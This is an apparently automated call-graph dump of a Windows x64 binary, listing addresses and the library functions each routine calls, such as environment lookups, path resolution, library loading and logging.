7ff68d5ef6db GetProcAddress 6747->6749 6752 7ff68d5ef57a 6748->6752 6753 7ff68d5ef6f1 6749->6753 6749->6777 6751 7ff68d5ef7b8 6750->6751 6754 7ff68d5e7720 3 API calls 6751->6754 6755 7ff68d5e7720 3 API calls 6752->6755 6756 7ff68d5e7720 3 API calls 6753->6756 6757 7ff68d5ef7d2 6754->6757 6758 7ff68d5ef594 6755->6758 6759 7ff68d5ef704 6756->6759 6761 7ff68d5e7720 3 API calls 6757->6761 6762 7ff68d5e7720 3 API calls 6758->6762 6760 7ff68d5e77d0 16 API calls 6759->6760 6760->6777 6763 7ff68d5ef7ef GetProcAddress 6761->6763 6764 7ff68d5ef5b1 6762->6764 6765 7ff68d5ef81b 6763->6765 6766 7ff68d5ef808 6763->6766 6767 7ff68d5e7720 3 API calls 6764->6767 6769 7ff68d5e7b10 6 API calls 6765->6769 6768 7ff68d5e7720 3 API calls 6766->6768 6770 7ff68d5ef5c0 GetProcAddress 6767->6770 6768->6765 6775 7ff68d5ef820 6769->6775 6771 7ff68d5ef5ec 6770->6771 6772 7ff68d5ef5d9 6770->6772 7213 7ff68d5e7b10 6771->7213 6773 7ff68d5e7720 3 API calls 6772->6773 6773->6771 6776 7ff68d5eef20 42 API calls 6775->6776 6775->6777 6776->6777 6777->6730 6779 7ff68d5e4834 6778->6779 6780 7ff68d5e4524 6778->6780 6782 7ff68d5f0ce0 __GSHandlerCheck_EH 8 API calls 6779->6782 6781 7ff68d5eb670 16 API calls 6780->6781 6785 7ff68d5e455d 6781->6785 6783 7ff68d5e4840 6782->6783 6783->6610 6787 7ff68d5e45d4 6785->6787 6788 7ff68d5e46be 6785->6788 6794 7ff68d5e456e _Yarn 6785->6794 6795 7ff68d5e4740 6785->6795 6796 7ff68d5e45fc 6787->6796 6797 7ff68d5e4867 6787->6797 6791 7ff68d5e4862 6788->6791 6792 7ff68d5e46d9 6788->6792 6789 7ff68d5e4785 7716 7ff68d5e30e0 GetEnvironmentVariableW 6789->7716 6790 7ff68d5e479b 6793 7ff68d5e47da 6790->6793 6803 7ff68d5e47d3 _invalid_parameter_noinfo_noreturn 6790->6803 6799 7ff68d5e5ec0 3 API calls 6791->6799 6800 7ff68d5e6070 5 API calls 6792->6800 6793->6779 6804 7ff68d5e482f 6793->6804 6806 7ff68d5e4828 _invalid_parameter_noinfo_noreturn 6793->6806 6794->6795 6802 7ff68d5e4739 _invalid_parameter_noinfo_noreturn 6794->6802 7689 7ff68d5e2440 RegisterEventSourceW 6795->7689 6796->6794 6805 7ff68d5e486d 6796->6805 6807 7ff68d5e4639 6796->6807 6808 7ff68d5e4698 6796->6808 6801 7ff68d5e1460 3 API calls 6797->6801 6799->6797 6800->6794 6801->6805 6802->6795 6803->6793 6804->6779 6809 7ff68d5e13c0 Concurrency::cancel_current_task 3 API calls 6805->6809 6806->6804 6807->6805 6810 7ff68d5e4646 6807->6810 6811 7ff68d5f0d08 std::_Facet_Register 4 API calls 6808->6811 6814 7ff68d5e4873 6809->6814 6812 7ff68d5f0d08 std::_Facet_Register 4 API calls 6810->6812 6811->6794 6813 7ff68d5e464e 6812->6813 6813->6794 6813->6802 6814->6610 6816 7ff68d5e618f 6815->6816 6819 7ff68d5e6099 6815->6819 6817 7ff68d5e1460 3 API calls 6816->6817 6818 7ff68d5e6194 6817->6818 6822 7ff68d5e13c0 Concurrency::cancel_current_task 3 API calls 6818->6822 6819->6818 6820 7ff68d5e60a4 _Yarn 6819->6820 6821 7ff68d5e614e 6819->6821 6823 7ff68d5e6100 6819->6823 6820->6597 6825 7ff68d5f0d08 std::_Facet_Register 4 API calls 6821->6825 6824 7ff68d5e619a 6822->6824 6826 7ff68d5f0d08 std::_Facet_Register 4 API calls 6823->6826 6827 7ff68d5e610d 6825->6827 6828 7ff68d5e6108 6826->6828 6827->6820 6828->6827 6829 7ff68d5e6147 _invalid_parameter_noinfo_noreturn 6828->6829 6829->6821 6831 7ff68d5e77c8 6830->6831 6832 7ff68d5e7744 6830->6832 6831->6603 6831->6608 6833 7ff68d5e776c SwitchToThread 6832->6833 6834 7ff68d5e7780 6832->6834 6833->6832 6835 7ff68d5e778c __stdio_common_vfwprintf fputwc 6834->6835 6835->6831 6837 7ff68d5f0ce9 6836->6837 6838 7ff68d5f16b0 IsProcessorFeaturePresent 6837->6838 6839 7ff68d5efd15 6837->6839 6840 7ff68d5f16c8 6838->6840 6839->6615 8152 7ff68d5f1784 RtlCaptureContext 6840->8152 6846 7ff68d5e7b08 6845->6846 6847 7ff68d5e7a84 6845->6847 6846->6672 6848 7ff68d5e7ac0 6847->6848 6849 7ff68d5e7aac SwitchToThread 6847->6849 6850 7ff68d5e7acc __stdio_common_vfwprintf fputwc 6848->6850 6849->6847 6850->6846 6852 7ff68d5e6755 6851->6852 6857 7ff68d5e662a 6851->6857 6908 7ff68d5e1460 6852->6908 6854 7ff68d5e675a 6913 7ff68d5e13c0 6854->6913 6855 7ff68d5e66a0 6855->6854 6899 7ff68d5f0d08 6855->6899 6856 7ff68d5e66cc 6858 7ff68d5f0d08 std::_Facet_Register 4 API calls 6856->6858 6857->6854 6857->6855 6857->6856 6863 7ff68d5e6684 _Yarn 6857->6863 6858->6863 6862 7ff68d5e674e _invalid_parameter_noinfo_noreturn 6862->6852 6863->6862 6864 7ff68d5e6722 6863->6864 6864->6661 6866 7ff68d5e72ea 6865->6866 6874 7ff68d5e72e3 6865->6874 6867 7ff68d5e732f __acrt_iob_func GetEnvironmentVariableW 6866->6867 6871 7ff68d5e731b SwitchToThread 6866->6871 6868 7ff68d5e73b3 6867->6868 6869 7ff68d5e737b GetLastError 6867->6869 6880 7ff68d5e73c7 GetEnvironmentVariableW 6868->6880 6872 7ff68d5e747f GetEnvironmentVariableW 6869->6872 6873 7ff68d5e738c 6869->6873 6870 7ff68d5e763b 6875 7ff68d5f0ce0 __GSHandlerCheck_EH 8 API calls 6870->6875 6871->6866 6877 7ff68d5e74aa 6872->6877 6878 7ff68d5e74d8 GetLastError 6872->6878 6881 7ff68d5e7a60 3 API calls 6873->6881 6874->6870 6879 7ff68d5e7634 _invalid_parameter_noinfo_noreturn 6874->6879 6876 7ff68d5e7130 6875->6876 6876->6666 6876->6672 6885 7ff68d5e74be GetEnvironmentVariableW 6877->6885 6882 7ff68d5e750b 6878->6882 6883 7ff68d5e74e9 6878->6883 6879->6870 6880->6869 6889 7ff68d5e73e1 6880->6889 6884 7ff68d5e73ae 6881->6884 6886 7ff68d5e75c4 6882->6886 6890 7ff68d5e75bd _invalid_parameter_noinfo_noreturn 6882->6890 6887 7ff68d5e7a60 3 API calls 6883->6887 6884->6872 6885->6878 6888 7ff68d5e7510 6885->6888 6886->6874 6940 7ff68d5e77d0 6886->6940 6887->6882 6888->6888 6894 7ff68d5e6600 5 API calls 6888->6894 6895 7ff68d5e7524 _Yarn 6888->6895 6892 7ff68d5e6600 5 API calls 6889->6892 6893 7ff68d5e73f8 _Yarn 6889->6893 6890->6886 6892->6893 6896 7ff68d5e7439 _wfsopen 6893->6896 6894->6895 6898 7ff68d5e7568 _wtoi 6895->6898 6896->6884 6897 7ff68d5e7462 setvbuf 6896->6897 6897->6872 6898->6882 6900 7ff68d5f0d22 malloc 6899->6900 6901 7ff68d5f0d13 6900->6901 6902 7ff68d5f0d2c 6900->6902 6901->6900 6903 7ff68d5f0d32 6901->6903 6902->6863 6906 7ff68d5f0d3d 6903->6906 6919 7ff68d5f01f8 6903->6919 6905 7ff68d5e13c0 Concurrency::cancel_current_task 3 API calls 6907 7ff68d5f0d43 6905->6907 6906->6905 6928 7ff68d5f023c 6908->6928 6914 7ff68d5e13ce Concurrency::cancel_current_task 6913->6914 6915 7ff68d5f25ec Concurrency::cancel_current_task 2 API calls 6914->6915 6916 7ff68d5e13df 6915->6916 6917 7ff68d5f2504 Concurrency::cancel_current_task free 6916->6917 6918 7ff68d5e1409 6917->6918 6920 7ff68d5f0206 std::bad_alloc::bad_alloc 6919->6920 6923 7ff68d5f25ec 6920->6923 6922 7ff68d5f0217 6924 7ff68d5f260b 6923->6924 6925 7ff68d5f2634 RtlPcToFileHeader 6924->6925 6926 7ff68d5f2656 RaiseException 6924->6926 6927 7ff68d5f264c 6925->6927 6926->6922 6927->6926 6933 7ff68d5f00a8 6928->6933 6931 7ff68d5f25ec Concurrency::cancel_current_task 2 API calls 6932 7ff68d5f025e 6931->6932 6936 7ff68d5f2504 6933->6936 6937 7ff68d5f00dc 6936->6937 6938 7ff68d5f2525 6936->6938 6937->6931 6938->6937 6939 7ff68d5f2567 free 6938->6939 6939->6937 6968 7ff68d5e6fd0 6940->6968 6942 7ff68d5e7803 __stdio_common_vswprintf 6943 7ff68d5e784a 6942->6943 6948 7ff68d5e7866 6942->6948 6943->6948 6952 7ff68d5e7873 6943->6952 6953 7ff68d5e789c 6943->6953 6962 7ff68d5e7a53 6943->6962 6944 7ff68d5e78ce __stdio_common_vsnwprintf_s OutputDebugStringW 6946 7ff68d5e793f 6944->6946 6947 7ff68d5e791d 6944->6947 6949 7ff68d5e798f 6946->6949 6950 7ff68d5e7958 __acrt_iob_func fputws __acrt_iob_func fputwc 6946->6950 6947->6946 6955 7ff68d5e792b SwitchToThread 6947->6955 6948->6944 6959 7ff68d5e79f3 6949->6959 6960 7ff68d5e79a6 __acrt_iob_func 6949->6960 6950->6949 6956 7ff68d5e7a4e 6952->6956 6957 7ff68d5e7880 6952->6957 6954 7ff68d5f0d08 std::_Facet_Register 4 API calls 6953->6954 6963 7ff68d5e7885 6954->6963 6955->6947 6961 7ff68d5e13c0 Concurrency::cancel_current_task 3 API calls 6956->6961 6958 7ff68d5f0d08 std::_Facet_Register 4 API calls 6957->6958 6958->6963 6966 7ff68d5e7a35 6959->6966 6967 7ff68d5e7a2e _invalid_parameter_noinfo_noreturn 6959->6967 6964 7ff68d5e79c3 __stdio_common_vfwprintf fputwc 6960->6964 6965 7ff68d5e79bd 6960->6965 6961->6962 6969 7ff68d5e7c10 6962->6969 6963->6948 6963->6967 6964->6959 6965->6959 6965->6964 6966->6874 6967->6966 6968->6942 6970 7ff68d5f023c 3 API calls 6969->6970 6971 7ff68d5e7c20 6970->6971 6975 7ff68d5eb6c0 6972->6975 6973 7ff68d5eb732 GetModuleFileNameW 6973->6975 6977 7ff68d5eb761 6973->6977 6975->6973 7218 7ff68d5eda60 6975->7218 6976 7ff68d5eb877 6978 7ff68d5f0ce0 __GSHandlerCheck_EH 8 API calls 6976->6978 6979 7ff68d5eb772 6977->6979 6980 7ff68d5eda60 5 API calls 6977->6980 6981 7ff68d5eb765 _Yarn 6977->6981 6982 7ff68d5eb88c 6978->6982 6979->6981 6984 7ff68d5e6600 5 API calls 6979->6984 6980->6979 6981->6976 6983 7ff68d5eb870 _invalid_parameter_noinfo_noreturn 6981->6983 6982->6681 6985 7ff68d5ecd20 6982->6985 6983->6976 6984->6981 6988 7ff68d5ecd64 6985->6988 7005 7ff68d5ecda3 6985->7005 6986 7ff68d5f0ce0 __GSHandlerCheck_EH 8 API calls 6987 7ff68d5ecdfb 6986->6987 6987->6684 6989 7ff68d5ecd92 GetFileAttributesExW 6988->6989 6990 7ff68d5ecda7 GetFullPathNameW 6988->6990 6989->6990 6989->7005 6992 7ff68d5ecdcc 6990->6992 6993 7ff68d5ece17 6990->6993 6996 7ff68d5e77d0 16 API calls 6992->6996 6992->7005 6994 7ff68d5ece9d 6993->6994 6999 7ff68d5ece3f 6993->6999 6995 7ff68d5ecea9 GetFullPathNameW 6994->6995 6997 7ff68d5eda60 5 API calls 6994->6997 7000 7ff68d5ecf1b 6995->7000 7013 7ff68d5ece65 _Yarn 6995->7013 6996->7005 6997->6995 7001 7ff68d5e6600 5 API calls 6999->7001 6999->7013 7003 7ff68d5e77d0 16 API calls 7000->7003 7000->7013 7001->7013 7002 7ff68d5ed0e1 GetFileAttributesExW 7002->7013 7003->7013 7005->6986 7006 7ff68d5ecf81 _invalid_parameter_noinfo_noreturn 7006->7013 7007 7ff68d5e6600 5 API calls 7007->7013 7009 7ff68d5ed268 7010 7ff68d5e13c0 Concurrency::cancel_current_task 3 API calls 7009->7010 7011 7ff68d5ed26d 7010->7011 7242 7ff68d5e8ef0 7011->7242 7012 7ff68d5ed231 _invalid_parameter_noinfo_noreturn 7012->7013 7013->7002 7013->7005 7013->7006 7013->7007 7013->7009 7013->7012 7016 7ff68d5ed1bd 7013->7016 7233 7ff68d5e9250 7013->7233 7236 7ff68d5ed9d0 7013->7236 7015 7ff68d5f0d08 malloc free RtlPcToFileHeader RaiseException std::_Facet_Register 7015->7016 7016->7012 7016->7013 7016->7015 7017 7ff68d5ed907 7018 7ff68d5e1460 3 API calls 7017->7018 7019 7ff68d5ed90d 7018->7019 7024 7ff68d5e13c0 Concurrency::cancel_current_task 3 API calls 7019->7024 7020 7ff68d5ed459 7020->7017 7021 7ff68d5ed901 7020->7021 7022 7ff68d5ed4b9 _Yarn 7020->7022 7026 7ff68d5ed4f0 7020->7026 7027 7ff68d5ed53d 7020->7027 7044 7ff68d5ed874 7020->7044 7023 7ff68d5e13c0 Concurrency::cancel_current_task 3 API calls 7021->7023 7025 7ff68d5e7dd0 16 API calls 7022->7025 7023->7017 7029 7ff68d5ed913 7024->7029 7030 7ff68d5ed57c 7025->7030 7026->7021 7031 7ff68d5ed4fd 7026->7031 7028 7ff68d5f0d08 std::_Facet_Register 4 API calls 7027->7028 7028->7022 7033 7ff68d5ed58d FindFirstFileExW 7030->7033 7032 7ff68d5f0d08 std::_Facet_Register 4 API calls 7031->7032 7034 7ff68d5ed505 7032->7034 7037 7ff68d5ed826 7033->7037 7052 7ff68d5ed5c9 _Yarn 7033->7052 7034->7022 7038 7ff68d5ed85f _invalid_parameter_noinfo_noreturn 7034->7038 7035 7ff68d5ecd20 34 API calls 7035->7020 7036 7ff68d5ed2b3 7036->7020 7036->7035 7037->7038 7037->7044 7039 7ff68d5ed866 _invalid_parameter_noinfo_noreturn 7038->7039 7041 7ff68d5ed86d _invalid_parameter_noinfo_noreturn 7039->7041 7040 7ff68d5ed807 FindNextFileW 7043 7ff68d5ed81c FindClose 7040->7043 7040->7052 7041->7044 7042 7ff68d5ed8cd 7045 7ff68d5f0ce0 __GSHandlerCheck_EH 8 API calls 7042->7045 7043->7037 7044->7042 7047 7ff68d5ed8c6 _invalid_parameter_noinfo_noreturn 7044->7047 7048 7ff68d5ed8e1 7045->7048 7046 7ff68d5e6070 5 API calls 7046->7052 7047->7042 7048->6684 7049 7ff68d5ed8fc 7051 7ff68d5e1460 3 API calls 7049->7051 7051->7021 7052->7019 7052->7040 7052->7041 7052->7046 7052->7049 7055 7ff68d5ed72f 7052->7055 7258 7ff68d5e9350 7052->7258 7053 7ff68d5f0d08 std::_Facet_Register 4 API calls 7053->7052 7054 7ff68d5f0d08 std::_Facet_Register 4 API calls 7054->7055 7055->7039 7055->7040 7055->7052 7055->7053 7055->7054 7057 7ff68d5eed10 7056->7057 7057->7057 7058 7ff68d5eed2d MultiByteToWideChar 7057->7058 7059 7ff68d5eeedc 7058->7059 7060 7ff68d5eed59 7058->7060 7062 7ff68d5e77d0 16 API calls 7059->7062 7061 7ff68d5ed9d0 5 API calls 7060->7061 7063 7ff68d5eed64 MultiByteToWideChar 7061->7063 7072 7ff68d5eeecf 7062->7072 7063->7059 7065 7ff68d5eed99 7063->7065 7303 7ff68d5e61a0 7065->7303 7066 7ff68d5f0ce0 __GSHandlerCheck_EH 8 API calls 7067 7ff68d5eeef7 7066->7067 7067->6699 7069 7ff68d5eee82 7070 7ff68d5e7720 3 API calls 7069->7070 7074 7ff68d5eee7e 7070->7074 7071 7ff68d5eedc9 7071->7069 7073 7ff68d5eef11 7071->7073 7078 7ff68d5eee28 7071->7078 7072->7066 7317 7ff68d5e5ec0 7073->7317 7074->7072 7076 7ff68d5eeec8 _invalid_parameter_noinfo_noreturn 7074->7076 7076->7072 7078->7069 7079 7ff68d5eee65 7078->7079 7080 7ff68d5e77d0 16 API calls 7079->7080 7080->7074 7082 7ff68d5e8ef0 5 API calls 7081->7082 7087 7ff68d5e7f67 7082->7087 7083 7ff68d5e811b 7084 7ff68d5e81a5 7083->7084 7343 7ff68d5e9110 7083->7343 7086 7ff68d5e1460 3 API calls 7084->7086 7089 7ff68d5e81aa 7086->7089 7087->7083 7088 7ff68d5e8019 7087->7088 7090 7ff68d5e6070 5 API calls 7088->7090 7092 7ff68d5e806d 7090->7092 7091 7ff68d5e80f2 7093 7ff68d5f0ce0 __GSHandlerCheck_EH 8 API calls 7091->7093 7097 7ff68d5e807b 7092->7097 7328 7ff68d5e5ee0 7092->7328 7095 7ff68d5e8106 7093->7095 7094 7ff68d5e819e _invalid_parameter_noinfo_noreturn 7094->7084 7095->6699 7097->7091 7097->7094 7099 7ff68d5e7e10 7098->7099 7099->7099 7100 7ff68d5e6070 5 API calls 7099->7100 7101 7ff68d5e7e2c 7100->7101 7102 7ff68d5e7e89 _invalid_parameter_noinfo_noreturn 7101->7102 7105 7ff68d5e7e90 7101->7105 7102->7105 7103 7ff68d5e7ed2 7348 7ff68d5e5500 7103->7348 7105->7103 7106 7ff68d5e7e9a 7105->7106 7108 7ff68d5e5ee0 5 API calls 7105->7108 7107 7ff68d5f0ce0 __GSHandlerCheck_EH 8 API calls 7106->7107 7109 7ff68d5e7f1d 7107->7109 7108->7103 7109->6704 7109->6708 7111 7ff68d5ee697 7110->7111 7115 7ff68d5ee6da 7110->7115 7112 7ff68d5e6070 5 API calls 7111->7112 7114 7ff68d5ee6be 7112->7114 7113 7ff68d5ee72c 7116 7ff68d5ee761 7113->7116 7117 7ff68d5ee736 7113->7117 7369 7ff68d5e7c60 7114->7369 7115->7113 7121 7ff68d5ee725 _invalid_parameter_noinfo_noreturn 7115->7121 7391 7ff68d5e87b0 7116->7391 7122 7ff68d5e7720 3 API calls 7117->7122 7121->7113 7125 7ff68d5ee74f 7122->7125 7123 7ff68d5ee7a3 7128 7ff68d5e7720 3 API calls 7123->7128 7124 7ff68d5ee7cf 7419 7ff68d5ec5f0 7124->7419 7386 7ff68d5e5480 7125->7386 7142 7ff68d5ee7ca _Yarn 7128->7142 7132 7ff68d5f0ce0 __GSHandlerCheck_EH 8 API calls 7135 7ff68d5eec77 7132->7135 7135->6716 7181 7ff68d5eb8b0 7135->7181 7136 7ff68d5e8ef0 5 API calls 7138 7ff68d5ee881 7136->7138 7140 7ff68d5e7dd0 16 API calls 7138->7140 7143 7ff68d5ee892 7140->7143 7142->7136 7145 7ff68d5e7dd0 16 API calls 7143->7145 7146 7ff68d5ee8a2 7145->7146 7148 7ff68d5e8ef0 5 API calls 7146->7148 7147 7ff68d5eec14 7149 7ff68d5ee75a 7147->7149 7152 7ff68d5eec5c _invalid_parameter_noinfo_noreturn 7147->7152 7150 7ff68d5ee8af 7148->7150 7149->7132 7153 7ff68d5ecd20 47 API calls 7150->7153 7151 7ff68d5eec0d _invalid_parameter_noinfo_noreturn 7151->7147 7152->7149 7154 7ff68d5ee8bb 7153->7154 7155 7ff68d5ee8fc 7154->7155 7157 7ff68d5ee8f5 _invalid_parameter_noinfo_noreturn 7154->7157 7156 7ff68d5ee92d 7155->7156 7158 7ff68d5ec5f0 43 API calls 7155->7158 7170 7ff68d5eeb57 7155->7170 7447 7ff68d5ebd80 7156->7447 7157->7155 7160 7ff68d5ee91b 7158->7160 7160->7156 7422 7ff68d5ebb10 7160->7422 7163 7ff68d5ee7f7 7163->7147 7163->7151 7165 7ff68d5eebc0 _invalid_parameter_noinfo_noreturn 7165->7163 7170->7163 7170->7165 7182 7ff68d5e8ef0 5 API calls 7181->7182 7184 7ff68d5eb8da 7182->7184 7183 7ff68d5ecd20 47 API calls 7185 7ff68d5eb96e 7183->7185 7184->7183 7187 7ff68d5eb97a LoadLibraryExW 7184->7187 7186 7ff68d5eb99c GetLastError 7185->7186 7185->7187 7188 7ff68d5eb9a6 7186->7188 7187->7186 7190 7ff68d5eb9d2 GetModuleHandleExW 7187->7190 7189 7ff68d5e77d0 16 API calls 7188->7189 7202 7ff68d5eb9cb 7189->7202 7191 7ff68d5eb9f3 7190->7191 7192 7ff68d5eba1b 7190->7192 7193 7ff68d5e77d0 16 API calls 7191->7193 7195 7ff68d5eb670 16 API calls 7192->7195 7192->7202 7193->7202 7194 7ff68d5ebaec 7196 7ff68d5f0ce0 __GSHandlerCheck_EH 8 API calls 7194->7196 7197 7ff68d5eba4e 7195->7197 7199 7ff68d5ebb00 7196->7199 7200 7ff68d5e7720 3 API calls 7197->7200 7198 7ff68d5ebae5 _invalid_parameter_noinfo_noreturn 7198->7194 7199->6716 7199->6719 7201 7ff68d5eba68 7200->7201 7201->7202 7203 7ff68d5ebaa0 _invalid_parameter_noinfo_noreturn 7201->7203 7202->7194 7202->7198 7203->7202 7591 7ff68d5e8a50 7204->7591 7207 7ff68d5e77d0 16 API calls 7208 7ff68d5eefa0 7207->7208 7209 7ff68d5eefe1 7208->7209 7212 7ff68d5eefda _invalid_parameter_noinfo_noreturn 7208->7212 7210 7ff68d5f0ce0 __GSHandlerCheck_EH 8 API calls 7209->7210 7211 7ff68d5eeff3 7210->7211 7211->6777 7212->7209 7214 7ff68d5e7b70 __acrt_iob_func fflush __acrt_iob_func fflush 7213->7214 7216 7ff68d5e7b1e 7213->7216 7215 7ff68d5e7b53 fflush 7215->7214 7216->7215 7217 7ff68d5e7b3f SwitchToThread 7216->7217 7217->7216 7219 7ff68d5edc01 7218->7219 7222 7ff68d5eda8e 7218->7222 7220 7ff68d5e1460 3 API calls 7219->7220 7221 7ff68d5edc06 7220->7221 7226 7ff68d5e13c0 Concurrency::cancel_current_task 3 API calls 7221->7226 7222->7221 7223 7ff68d5edb10 7222->7223 7224 7ff68d5edb3c 7222->7224 7231 7ff68d5edaf4 _Yarn 7222->7231 7223->7221 7227 7ff68d5edb1d 7223->7227 7225 7ff68d5f0d08 std::_Facet_Register 4 API calls 7224->7225 7225->7231 7229 7ff68d5edc0c 7226->7229 7228 7ff68d5f0d08 std::_Facet_Register 4 API calls 7227->7228 7228->7231 7230 7ff68d5edbb4 _invalid_parameter_noinfo_noreturn 7232 7ff68d5edba7 _Yarn 7230->7232 7231->7230 7231->7232 7232->6973 7234 7ff68d5e9323 7233->7234 7280 7ff68d5e9510 7234->7280 7237 7ff68d5ed9e2 7236->7237 7238 7ff68d5ed9fd 7236->7238 7237->7013 7239 7ff68d5eda60 5 API calls 7238->7239 7240 7ff68d5eda12 7238->7240 7241 7ff68d5eda50 7239->7241 7240->7013 7241->7013 7243 7ff68d5e8f21 7242->7243 7244 7ff68d5e9015 7243->7244 7245 7ff68d5e8f3b 7243->7245 7247 7ff68d5e1460 3 API calls 7244->7247 7246 7ff68d5e8f41 _Yarn 7245->7246 7248 7ff68d5e901a 7245->7248 7250 7ff68d5e8fda 7245->7250 7252 7ff68d5e8fb5 7245->7252 7246->7036 7247->7248 7249 7ff68d5e13c0 Concurrency::cancel_current_task 3 API calls 7248->7249 7251 7ff68d5e9020 7249->7251 7253 7ff68d5f0d08 std::_Facet_Register 4 API calls 7250->7253 7254 7ff68d5f0d08 std::_Facet_Register 4 API calls 7252->7254 7253->7246 7255 7ff68d5e8fbd 7254->7255 7256 7ff68d5e8fc5 7255->7256 7257 7ff68d5e8fd3 _invalid_parameter_noinfo_noreturn 7255->7257 7256->7246 7257->7250 7259 7ff68d5e9500 7258->7259 7264 7ff68d5e9391 7258->7264 7261 7ff68d5e7c10 3 API calls 7259->7261 7260 7ff68d5e94fb 7263 7ff68d5e13c0 Concurrency::cancel_current_task 3 API calls 7260->7263 7262 7ff68d5e9506 7261->7262 7263->7259 7264->7260 7265 7ff68d5e93f4 7264->7265 7266 7ff68d5e941d 7264->7266 7271 7ff68d5e93df 7264->7271 7265->7260 7269 7ff68d5f0d08 std::_Facet_Register 4 API calls 7265->7269 7267 7ff68d5f0d08 std::_Facet_Register 4 API calls 7266->7267 7267->7271 7268 7ff68d5e8ef0 5 API calls 7270 7ff68d5e9455 7268->7270 7269->7271 7272 7ff68d5e9471 7270->7272 7295 7ff68d5e96a0 7270->7295 7271->7268 7274 7ff68d5e94f4 _invalid_parameter_noinfo_noreturn 7271->7274 7273 7ff68d5e96a0 _invalid_parameter_noinfo_noreturn 7272->7273 7276 7ff68d5e9485 7273->7276 7274->7260 7279 7ff68d5e94c3 7276->7279 7299 7ff68d5e9080 7276->7299 7279->7052 7281 7ff68d5e9692 7280->7281 7286 7ff68d5e9539 7280->7286 7282 7ff68d5e1460 3 API calls 7281->7282 7283 7ff68d5e9697 7282->7283 7289 7ff68d5e13c0 Concurrency::cancel_current_task 3 API calls 7283->7289 7284 7ff68d5e95b2 7284->7283 7287 7ff68d5e95bf 7284->7287 7285 7ff68d5e95de 7288 7ff68d5f0d08 std::_Facet_Register 4 API calls 7285->7288 7286->7283 7286->7284 7286->7285 7292 7ff68d5e9597 _Yarn 7286->7292 7291 7ff68d5f0d08 std::_Facet_Register 4 API calls 7287->7291 7288->7292 7290 7ff68d5e969d 7289->7290 7291->7292 7293 7ff68d5e965a _invalid_parameter_noinfo_noreturn 7292->7293 7294 7ff68d5e964d _Yarn 7292->7294 7293->7294 7296 7ff68d5e96ae 7295->7296 7297 7ff68d5e9080 _invalid_parameter_noinfo_noreturn 7296->7297 7298 7ff68d5e970e 7297->7298 7298->7272 7300 7ff68d5e90f3 7299->7300 7301 7ff68d5e9085 7299->7301 7300->7274 7300->7279 7301->7300 7302 7ff68d5e9103 _invalid_parameter_noinfo_noreturn 7301->7302 7304 7ff68d5e62a3 7303->7304 7309 7ff68d5e61d1 7303->7309 7306 7ff68d5e1460 3 API calls 7304->7306 7305 7ff68d5e61d7 _Yarn 7305->7071 7308 7ff68d5e62a8 7306->7308 7307 7ff68d5e6203 7310 7ff68d5f0d08 std::_Facet_Register 4 API calls 7307->7310 7311 7ff68d5e13c0 Concurrency::cancel_current_task 3 API calls 7308->7311 7309->7305 7309->7307 7309->7308 7312 7ff68d5e6263 7309->7312 7314 7ff68d5e6219 7310->7314 7315 7ff68d5e62ae 7311->7315 7313 7ff68d5f0d08 std::_Facet_Register 4 API calls 7312->7313 7313->7305 7314->7305 7316 7ff68d5e625c _invalid_parameter_noinfo_noreturn 7314->7316 7316->7312 7320 7ff68d5f0260 7317->7320 7325 7ff68d5f0168 7320->7325 7323 7ff68d5f25ec Concurrency::cancel_current_task 2 API calls 7324 7ff68d5f0282 7323->7324 7326 7ff68d5f2504 Concurrency::cancel_current_task free 7325->7326 7327 7ff68d5f019c 7326->7327 7327->7323 7329 7ff68d5e6061 7328->7329 7332 7ff68d5e5f10 7328->7332 7330 7ff68d5e1460 3 API calls 7329->7330 7331 7ff68d5e6066 7330->7331 7336 7ff68d5e13c0 Concurrency::cancel_current_task 3 API calls 7331->7336 7332->7331 7333 7ff68d5e5f92 7332->7333 7334 7ff68d5e5fba 7332->7334 7341 7ff68d5e5f76 _Yarn 7332->7341 7333->7331 7337 7ff68d5e5f9f 7333->7337 7335 7ff68d5f0d08 std::_Facet_Register 4 API calls 7334->7335 7335->7341 7338 7ff68d5e606c 7336->7338 7339 7ff68d5f0d08 std::_Facet_Register 4 API calls 7337->7339 7339->7341 7340 7ff68d5e6022 _invalid_parameter_noinfo_noreturn 7342 7ff68d5e6015 _Yarn 7340->7342 7341->7340 7341->7342 7342->7097 7344 7ff68d5e9165 7343->7344 7345 7ff68d5e91f7 _Yarn 7343->7345 7344->7345 7346 7ff68d5e13c0 Concurrency::cancel_current_task 3 API calls 7344->7346 7345->7097 7347 7ff68d5e924d 7346->7347 7349 7ff68d5e5513 7348->7349 7349->7349 7352 7ff68d5e5531 _Yarn 7349->7352 7353 7ff68d5e62b0 7349->7353 7351 7ff68d5e5585 7351->7106 7352->7106 7354 7ff68d5e6457 7353->7354 7357 7ff68d5e62de 7353->7357 7355 7ff68d5e1460 3 API calls 7354->7355 7356 7ff68d5e645c 7355->7356 7362 7ff68d5e13c0 Concurrency::cancel_current_task 3 API calls 7356->7362 7357->7356 7358 7ff68d5e6360 7357->7358 7359 7ff68d5e638c 7357->7359 7367 7ff68d5e6344 _Yarn 7357->7367 7358->7356 7360 7ff68d5e636d 7358->7360 7361 7ff68d5f0d08 std::_Facet_Register 4 API calls 7359->7361 7363 7ff68d5f0d08 std::_Facet_Register 4 API calls 7360->7363 7365 7ff68d5e6375 7361->7365 7364 7ff68d5e6462 7362->7364 7363->7365 7366 7ff68d5e640f _invalid_parameter_noinfo_noreturn 7365->7366 7365->7367 7368 7ff68d5e6402 _Yarn 7366->7368 7367->7366 7367->7368 7368->7351 7370 7ff68d5e8ef0 5 API calls 7369->7370 7371 7ff68d5e7c8a 7370->7371 7372 7ff68d5e7dd0 16 API calls 7371->7372 7373 7ff68d5e7ca2 7372->7373 7374 7ff68d5e8ef0 5 API calls 7373->7374 7375 7ff68d5e7cb1 7374->7375 7376 7ff68d5ecd20 47 API calls 7375->7376 7377 7ff68d5e7cbe 7376->7377 7378 7ff68d5e7cfa _invalid_parameter_noinfo_noreturn 7377->7378 7379 7ff68d5e7d01 7377->7379 7378->7379 7381 7ff68d5e7d0b _Yarn 7379->7381 7383 7ff68d5e6600 5 API calls 7379->7383 7380 7ff68d5f0ce0 __GSHandlerCheck_EH 8 API calls 7382 7ff68d5e7dc6 7380->7382 7384 7ff68d5e7daa _invalid_parameter_noinfo_noreturn 7381->7384 7385 7ff68d5e7db1 7381->7385 7382->7115 7383->7381 7384->7385 7385->7380 7387 7ff68d5e54f2 7386->7387 7388 7ff68d5e548e 7386->7388 7387->7149 7389 7ff68d5e6600 5 API calls 7388->7389 7390 7ff68d5e54a8 _Yarn 7388->7390 7389->7387 7390->7149 7392 7ff68d5e8800 7391->7392 